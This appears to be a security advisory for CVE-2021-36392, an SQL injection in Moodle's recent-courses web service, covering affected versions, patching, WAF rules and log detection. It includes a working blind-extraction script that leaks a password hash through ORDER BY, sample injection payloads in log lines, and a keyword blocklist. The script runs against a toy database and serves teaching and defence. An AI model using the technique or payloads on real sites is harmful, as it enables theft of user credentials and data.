CVE-2021-36392

9.8 CRITICAL

📋 TL;DR

CVE-2021-36392 is an SQL injection vulnerability in the Moodle library code that fetches a user's recent courses: the function builds its ORDER BY clause from a caller-supplied sort string, and that function is reachable by any authenticated user through the `core_course_get_recent_courses` web service (the one used by the Recently accessed courses block and the mobile app). A sort column is an identifier, so it cannot be bound as a query parameter; the injected expression is evaluated by the database with the privileges of Moodle's application account, which means read access to every table in the Moodle database (user records and password hashes, grades, session data) and, depending on the database engine and account privileges, more. The flaw is in core Moodle, not an optional plugin, in the version ranges listed below.

💻 Affected Systems

Products:
  • Moodle
Versions: Moodle 3.9 to 3.9.7, 3.10 to 3.10.4, and 3.11 (3.11.0); the vendor advisory also lists earlier, unsupported branches as affected
Operating Systems: All operating systems running Moodle (Linux, Windows, macOS)
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerable code is core Moodle (the course library and its web-service wrapper), so every installation in the affected ranges carries it; no optional feature has to be enabled and no configuration setting removes it. An attacker does need a valid account on the site.

📦 What is this software?

Moodle is an open-source learning management system written in PHP, used by schools, universities and corporate training departments to host courses, assignments, quizzes and grades. It runs on MySQL/MariaDB, PostgreSQL or another supported database, is usually internet-facing so that students can reach it from anywhere, and exposes a web-service API used by its official mobile app. A typical site holds personal data and grades for its entire user population, which is why a database-level flaw in it is rated critical.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full read of the Moodle database through the injection point: user records and bcrypt password hashes, session identifiers and grades, which is enough for account takeover up to and including site administrators. Where the Moodle database account holds elevated privileges (MySQL FILE, PostgreSQL superuser), the injected expression can also read or write files on the database host, which is the realistic path from this bug to code execution.

🟠

Likely Case

Disclosure of data the attacker's own account is not allowed to see: other users' personal data and grades, content of courses they are not enrolled in, and the user table's password hashes (bcrypt, so slow to crack, but usable for targeted attacks on privileged accounts). Extraction through an ORDER BY injection is typically blind, inferred from the ordering of returned rows, so it is slow but fully automatable.

🟢

If Mitigated

Limited impact where the code validates the sort field against an allowlist of column names (a sort column is an identifier and cannot be bound as a query parameter, so "use parameterized queries" alone does not close this gap); a least-privilege database account confines the damage to the Moodle schema; web application firewalls give partial cover at best, since an ORDER BY payload is easy to write around keyword signatures (case changes, inline comments, encoding).

🌐 Internet-Facing: HIGH - Moodle instances are typically internet-facing learning management systems accessible to users worldwide, making them prime targets for exploitation.
🏢 Internal Only: MEDIUM - Even internally hosted Moodle instances face risk from insider threats or compromised internal accounts, though attack surface is reduced.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires a valid Moodle login (any role, including a self-registered student), after which each probe is a single web-service request. SQL injection is well understood and routinely weaponised, and the public discussion of this issue contains enough technical detail to reproduce it.
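To make the mechanism concrete, here is an added example, written in Python over an in-memory SQLite database rather than in Moodle's PHP so that it runs stand-alone; it is not Moodle's code. The schema and data are constructed to resemble the tables involved (user, course, user_lastaccess) and the assumption, matching this CVE's bug class, is that a caller-controlled sort string is concatenated into ORDER BY while every other value is properly bound. The first function shows the bug, the second shows why it is critical (a boolean-based blind read of another user's password hash through nothing but result ordering), and the third shows the allowlist fix, which is the only fix available because identifiers cannot be parameterized.

```python
import sqlite3

def build_db():
    """Constructed toy schema resembling the Moodle tables involved (not Moodle's real DDL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE course (id INTEGER PRIMARY KEY, fullname TEXT);
        CREATE TABLE user_lastaccess (userid INTEGER, courseid INTEGER, timeaccess INTEGER);
        INSERT INTO user VALUES (2, 'admin', '$2y$10$deadbeef');   -- made-up hash
        INSERT INTO user VALUES (5, 'student', '$2y$10$cafef00d'); -- made-up hash
        INSERT INTO course VALUES (1, 'Intro to Security'), (2, 'Cryptography'), (3, 'Forensics');
        INSERT INTO user_lastaccess VALUES (5, 1, 100), (5, 2, 300), (5, 3, 200);
    """)
    return conn

def recent_courses_vulnerable(conn, userid, sort="ula.timeaccess DESC"):
    """Bug pattern: userid is bound as a parameter, but the sort clause is concatenated."""
    sql = ("SELECT c.id, c.fullname FROM course c "
           "JOIN user_lastaccess ula ON ula.courseid = c.id "
           "WHERE ula.userid = ? "
           f"ORDER BY {sort}")
    return conn.execute(sql, (userid,)).fetchall()

# Characters that can appear in a bcrypt hash string.
ALPHABET = "$./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

def recover_admin_hash_prefix(conn, userid, length=8):
    """Boolean-based blind extraction: a CASE expression in ORDER BY flips the
    result order depending on a condition about data in another table.
    The attacker (user 5) only ever sees their own course list."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in ALPHABET:
            cond = f"(SELECT substr(password, {pos}, 1) FROM user WHERE id = 2) = '{ch}'"
            payload = f"CASE WHEN {cond} THEN ula.timeaccess ELSE -c.id END DESC"
            rows = recent_courses_vulnerable(conn, userid, payload)
            # Guess right -> most recently accessed course (id 2) comes first;
            # guess wrong -> ordering falls back to ascending id (course 1 first).
            if rows[0][0] == 2:
                recovered += ch
                break
        else:
            break  # no character matched: end of string or outside the alphabet
    return recovered

# Allowlist: user-facing sort names mapped to trusted SQL column references.
SORT_FIELDS = {"timeaccess": "ula.timeaccess", "fullname": "c.fullname", "id": "c.id"}

def recent_courses_hardened(conn, userid, sort="timeaccess desc"):
    """Identifiers cannot be bound, so validate each 'field [asc|desc]' term against
    the allowlist and rebuild the ORDER BY clause from trusted strings only."""
    clauses = []
    for term in sort.split(","):
        parts = term.strip().split()
        if not 1 <= len(parts) <= 2:
            raise ValueError(f"invalid sort term: {term!r}")
        field = parts[0].lower()
        direction = parts[1].upper() if len(parts) == 2 else "ASC"
        if field not in SORT_FIELDS or direction not in ("ASC", "DESC"):
            raise ValueError(f"invalid sort term: {term!r}")
        clauses.append(f"{SORT_FIELDS[field]} {direction}")
    sql = ("SELECT c.id, c.fullname FROM course c "
           "JOIN user_lastaccess ula ON ula.courseid = c.id "
           "WHERE ula.userid = ? "
           f"ORDER BY {', '.join(clauses)}")
    return conn.execute(sql, (userid,)).fetchall()

if __name__ == "__main__":
    db = build_db()
    print("normal listing:", recent_courses_vulnerable(db, 5))
    print("leaked admin hash prefix:", recover_admin_hash_prefix(db, 5))
    try:
        recent_courses_hardened(db, 5, "CASE WHEN 1=1 THEN 1 ELSE 2 END")
    except ValueError as e:
        print("hardened version rejects payload:", e)
```

Note what the attacker never needs: no UNION, no stacked statement, no error message and no write access. Each request answers one yes/no question, so recovering a 60-character hash is a few thousand requests, which is why request volume per account to the affected endpoint is a useful detection signal.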

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Moodle 3.9.8, 3.10.5, 3.11.1 (the July 2021 security releases)

Vendor Advisory: https://moodle.org/mod/forum/discuss.php?d=424797

Restart Required: No (PHP loads the patched files on the next request; if OPcache runs with opcache.validate_timestamps=0, reload php-fpm or the web server so the old bytecode is dropped)

Instructions:

1. Back up the Moodle database and the moodledata directory before touching anything.
2. Replace the code tree with the patched release (pull the security branch with git, or unpack the release tarball), then run the upgrade, either from Site administration > Notifications or with `php admin/cli/upgrade.php`.
3. Verify the update completed: Site administration > Notifications should show the new release string and no pending upgrade.
4. Test core functionality after patching: login, course listing, and the Recently accessed courses block, which uses the patched code path.

🔧 Temporary Workarounds

Input Validation Enhancement (platform: all)

Implement additional input validation for the sort argument of the affected code. Not applicable as a drop-in workaround: it means editing core Moodle code, which is exactly what the official patch does, so apply the patch instead.

Web Application Firewall Rules (platform: linux)

Deploy WAF rules in front of the web server to reject obvious SQL injection payloads. Caveats: a keyword blocklist such as the one below will false-positive on ordinary LMS traffic (forum posts, quiz answers and course descriptions legitimately contain words like "select", "update" or "--"); it is easy to bypass with case changes, inline comments or encoding; and requests through `lib/ajax/service.php` carry their arguments in a JSON body, which ModSecurity only exposes in ARGS when the JSON request-body processor is enabled. Treat it as a stop-gap, scope it to the affected endpoints, and run it in DetectionOnly mode first.

# Example ModSecurity rule (illustrative; the original page's rule with its quoting corrected):
SecRule ARGS "@rx (?i)\b(union|select|insert|update|delete|drop)\b|--|#" \
    "id:1001,phase:2,deny,status:403,log,msg:'SQL Injection Attempt'"

🧯 If You Can't Patch

  • Run Moodle under a dedicated database account that owns only the Moodle database: no access to other schemas and no file or superuser privileges (MySQL FILE/SUPER, PostgreSQL superuser). Moodle needs full read/write on its own tables, so this does not stop the injection from reading the Moodle database; it limits lateral movement to the database host and other applications.
  • Enable database query logging (or the engine's general/slow query log) and alert on ORDER BY clauses containing CASE, subqueries or string literals issued by the Moodle account; since blind extraction needs thousands of near-identical requests, request volume per account to the recent-courses web service is the cheaper signal.
  • Shrink the authenticated population that can reach the code: disable self-registration and unused authentication methods and remove stale accounts, since exploitation requires a valid login.

🔍 How to Verify

Check if Vulnerable:

Check the Moodle release via Site administration > Notifications (the release string is shown there), or on the server: `version.php` in the Moodle root holds the code's `$release`, and `$CFG->release` / `$CFG->version` hold what is actually installed in the database once config.php has been loaded (the two differ if the code was replaced but the upgrade not yet run). Compare against the affected ranges.

Check Version:

php -r 'define("CLI_SCRIPT", true); require "config.php"; echo "Moodle release: $CFG->release (version $CFG->version)\n";'

Run this from the Moodle code root. The PHP is in single quotes so the shell does not expand `$CFG` to an empty string, and `CLI_SCRIPT` is defined because Moodle's setup expects it when config.php is loaded from the command line.

Verify Fix Applied:

Verify the installed release is 3.9.8 or later on the 3.9 branch, 3.10.5 or later on 3.10, or 3.11.1 or later on 3.11 (a "+" suffix marks a weekly build after that release). Then check that the Recently accessed courses block and the course overview still load and sort correctly, and that a non-allowlisted sort value sent to the recent-courses web service is rejected with a validation error rather than producing a database error.
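Checking one site by hand is easy; checking a fleet from collected `$CFG->release` strings is not, because Moodle's release format omits the patch level for the first release of a branch ("3.11 (Build: 20210517)") and marks weekly builds with "+". The following added example, not part of the original page, classifies release strings against the ranges stated above; the range table and the labels are this example's own.

```python
import re

# Affected ranges as stated on this page: branch -> highest affected patch level.
AFFECTED_MAX_PATCH = {(3, 9): 7, (3, 10): 4, (3, 11): 0}
# First fixed release per branch.
FIXED_RELEASE = {(3, 9): "3.9.8", (3, 10): "3.10.5", (3, 11): "3.11.1"}

# $release looks like "3.10.4+ (Build: 20210712)" or "3.11 (Build: 20210517)":
# the patch level is omitted for a branch's first release and "+" marks a weekly build.
RELEASE_RE = re.compile(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?(\+)?")

def parse_release(release):
    """Return (major, minor, patch, is_weekly_build) for a Moodle release string."""
    m = RELEASE_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised Moodle release string: {release!r}")
    major, minor, patch, plus = m.groups()
    return int(major), int(minor), int(patch or 0), plus == "+"

def assess(release):
    """Classify a release against the ranges on this page.
    Returns (status, detail) with status in
    'affected', 'fixed', 'indeterminate', 'later', 'unsupported'."""
    major, minor, patch, weekly = parse_release(release)
    branch = (major, minor)
    if branch not in AFFECTED_MAX_PATCH:
        if branch < (3, 9):
            # The page only covers 3.9 onwards; older branches are end-of-life.
            return "unsupported", "end-of-life branch not covered here; treat as affected until checked"
        return "later", "branch created after the fix"
    max_affected = AFFECTED_MAX_PATCH[branch]
    if patch > max_affected:
        return "fixed", f"{major}.{minor}.{patch} >= {FIXED_RELEASE[branch]}"
    if weekly and patch == max_affected:
        # A weekly build of the last affected release may or may not carry the fix;
        # compare its build date with the fix release date instead of guessing.
        return "indeterminate", "weekly build of the last affected release; check the build date"
    return "affected", f"upgrade to {FIXED_RELEASE[branch]}"

if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    for host, rel in [("lms-01", "3.10.4 (Build: 20210510)"),
                      ("lms-02", "3.11.1+ (Build: 20210716)"),
                      ("lms-03", "3.9.7+ (Build: 20210625)")]:
        print(host, rel, "->", assess(rel))
```

The "indeterminate" case is deliberate: a site reporting "3.9.7+" was upgraded to some weekly build after 3.9.7, which may or may not postdate the fix, and only the build date tells you which.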

📡 Detection & Monitoring

Log Indicators:

  • In Moodle's log and the PHP error log: `dml_read_exception` / "Error reading from database" entries whose failing SQL has an ORDER BY containing CASE, subqueries or string literals, originating from the recent-courses code
  • Bursts of requests from one account or source address to the recent-courses web service whose sort argument changes by one character at a time (the signature of boolean-based blind extraction)
  • Unexpected database errors in Moodle logs around the time of those requests

Network Indicators:

  • HTTP requests to `webservice/rest/server.php` with `wsfunction=core_course_get_recent_courses` whose `sort` value contains anything other than `field [asc|desc]` terms (parentheses, quotes, CASE, SELECT); calls through `lib/ajax/service.php?info=core_course_get_recent_courses` carry their arguments in a JSON POST body, so the payload is not visible in the URL and must be inspected in the request body
  • Unusual query volume or long-running queries from the web server's database account

SIEM Query:

source="moodle_logs" AND ("dml_read_exception" OR "Error reading from database") AND "recent_courses"

source="web_access_logs" AND "core_course_get_recent_courses" AND ("sort=CASE" OR "sort=(" OR "sort=%28" OR "SELECT")
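Where no SIEM is in front of the web tier, the same check can be run over the access log directly. The following added example, not from the original page, parses Apache combined-format lines, pulls the `sort` argument out of REST calls to `core_course_get_recent_courses`, and flags any value that is not a comma-separated list of `field [asc|desc]` terms, then counts flagged requests per source address, since blind extraction produces many of them. The log lines are constructed, the allowlist of field names is this example's assumption (use the column names your Moodle release accepts), and JSON-body AJAX calls are out of scope because their arguments never reach the access log.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines; not real traffic. Tokens are redacted.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jul/2021:09:14:02 +0000] "GET /webservice/rest/server.php?wstoken=REDACTED&wsfunction=core_course_get_recent_courses&moodlewsrestformat=json&userid=0&sort=timeaccess%20DESC HTTP/1.1" 200 512 "-" "MoodleMobile"
203.0.113.7 - - [13/Jul/2021:09:14:03 +0000] "GET /webservice/rest/server.php?wstoken=REDACTED&wsfunction=core_course_get_recent_courses&moodlewsrestformat=json&userid=0&sort=fullname HTTP/1.1" 200 512 "-" "MoodleMobile"
198.51.100.23 - - [13/Jul/2021:09:15:10 +0000] "GET /webservice/rest/server.php?wstoken=REDACTED&wsfunction=core_course_get_recent_courses&moodlewsrestformat=json&userid=0&sort=CASE%20WHEN%20(SELECT%20substr(password,1,1)%20FROM%20mdl_user%20WHERE%20id%3D2)%3D%27%24%27%20THEN%20timeaccess%20ELSE%20id%20END HTTP/1.1" 200 512 "-" "python-requests/2.25.1"
198.51.100.23 - - [13/Jul/2021:09:15:11 +0000] "GET /webservice/rest/server.php?wstoken=REDACTED&wsfunction=core_course_get_recent_courses&moodlewsrestformat=json&userid=0&sort=CASE%20WHEN%20(SELECT%20substr(password,2,1)%20FROM%20mdl_user%20WHERE%20id%3D2)%3D%272%27%20THEN%20timeaccess%20ELSE%20id%20END HTTP/1.1" 200 512 "-" "python-requests/2.25.1"
198.51.100.23 - - [13/Jul/2021:09:16:00 +0000] "GET /course/view.php?id=2 HTTP/1.1" 200 9000 "-" "python-requests/2.25.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Sort fields the recent-courses code is expected to accept (assumed allowlist for this example).
ALLOWED_FIELDS = {"id", "fullname", "shortname", "timeaccess", "startdate", "enddate"}
SORT_TERM_RE = re.compile(r"^([a-z_]+)(?:\s+(asc|desc))?$", re.IGNORECASE)

def sort_is_benign(sort):
    """True if every comma-separated term is 'allowed_field [asc|desc]'."""
    for term in sort.split(","):
        m = SORT_TERM_RE.match(term.strip())
        if not m or m.group(1).lower() not in ALLOWED_FIELDS:
            return False
    return True

def scan(log_text):
    """Return one finding per REST call to the recent-courses function with a non-benign sort."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m["target"]).query)   # percent-decodes values
        if qs.get("wsfunction", [""])[0] != "core_course_get_recent_courses":
            continue
        sort = qs.get("sort", [""])[0]
        if sort and not sort_is_benign(sort):
            findings.append({"ip": m["ip"], "ts": m["ts"], "sort": sort})
    return findings

def suspicious_sources(findings, threshold=2):
    """Source addresses with at least `threshold` flagged requests."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], h["sort"][:60])
    print("repeat offenders:", suspicious_sources(hits))
```

The allowlist approach is the same one the fix itself relies on, and it is why this check has a far lower false-positive rate than a keyword blocklist: legitimate clients only ever send column names.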
